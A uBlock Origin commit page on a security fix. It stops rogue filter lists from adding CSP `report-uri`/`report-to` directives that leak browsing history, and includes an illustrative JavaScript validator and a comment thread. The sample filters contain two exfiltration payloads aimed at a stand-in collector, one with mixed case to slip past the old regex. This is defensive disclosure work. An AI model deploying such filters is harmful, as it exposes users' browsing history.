Fix potential exfiltration of browsing history by a rogue list author through `csp=`

As reported internally to ubo-security by https://github.com/distinctmondaylila

One issue is a regression from the rewriting of the static filtering parser in version 1.47.0, specifically the following commit: 8ea3b0f64c

The existing regex was no longer suitable to properly detect some usage of `report-xxx` in the rewritten parser.

Another issue which predates 1.47.0 is that the regex used for validation was case-sensitive, while the `report-uri` directive can be written using uppercase letters, i.e. `Report-uri`.
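To illustrate the two defects the commit describes, here is an added example (not uBlock Origin's own parser code) that places a case-sensitive check for reporting directives beside a case-insensitive one and runs both over constructed `csp=` filter lines; the regexes, function names and sample filters are assumptions for this illustration.

```javascript
// Added illustration, not code from uBlock Origin. It models the validation
// of a `$csp=` filter option value: a filter list must not be able to inject
// a reporting directive, since `report-uri`/`report-to` would make the
// browser POST the page URL of every policy violation to a list author's
// collector. All names and regexes below are assumptions for this example.

// Check of the kind the commit calls insufficient: CSP directive names are
// case-insensitive, but this regex is not, so `Report-uri` slips through.
const reReportDirectiveCaseSensitive = /\breport-(?:uri|to)\b/;

// Corrected check: the `i` flag makes the match case-insensitive. It is
// deliberately conservative and rejects the token anywhere in the value.
const reReportDirective = /\breport-(?:uri|to)\b/i;

// Returns true when the csp option value contains no reporting directive.
function isSafeCspOptionValue(value) {
  if (typeof value !== 'string' || value.trim() === '') { return false; }
  return reReportDirective.test(value) === false;
}

// Compare both checks on one value (true = the check rejects the value).
function checkCspOptionValue(value) {
  return {
    rejectedByCaseSensitiveCheck: reReportDirectiveCaseSensitive.test(value),
    rejectedByFixedCheck: reReportDirective.test(value),
  };
}

// Split a filter such as `||example.com^$csp=script-src 'none'` into its
// pattern and csp value; returns null for lines without a `$csp=` option.
function parseCspFilter(line) {
  const m = /^(\|\|[^$]+)\$csp=(.*)$/.exec(line);
  if (m === null) { return null; }
  return { pattern: m[1], csp: m[2], safe: isSafeCspOptionValue(m[2]) };
}

// Keep only the `$csp=` filters a list may legitimately apply.
function acceptedCspFilters(lines) {
  return lines.map(parseCspFilter).filter(f => f !== null && f.safe);
}

// Constructed sample list: one benign filter, two exfiltration attempts.
const SAMPLE_FILTERS = [
  "||example.com^$csp=script-src 'none'",
  "||example.com^$csp=default-src 'self'; report-uri https://report.example/c",
  "||example.com^$csp=default-src 'self'; Report-uri https://report.example/c",
];
```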
db5656f
My mistake, the proper GitHub link for the contributor who discovered and reported the issue through email is:
https://github.com/distinctmondaylilac
@gorhill the "Block CSP reports" option was preventing this?
Yes, but it's not enabled by default in Chromium-based browsers.
Sounds like this was actually happening -- I am not aware that this was ever the case. "would have prevented these reports" would be more accurate.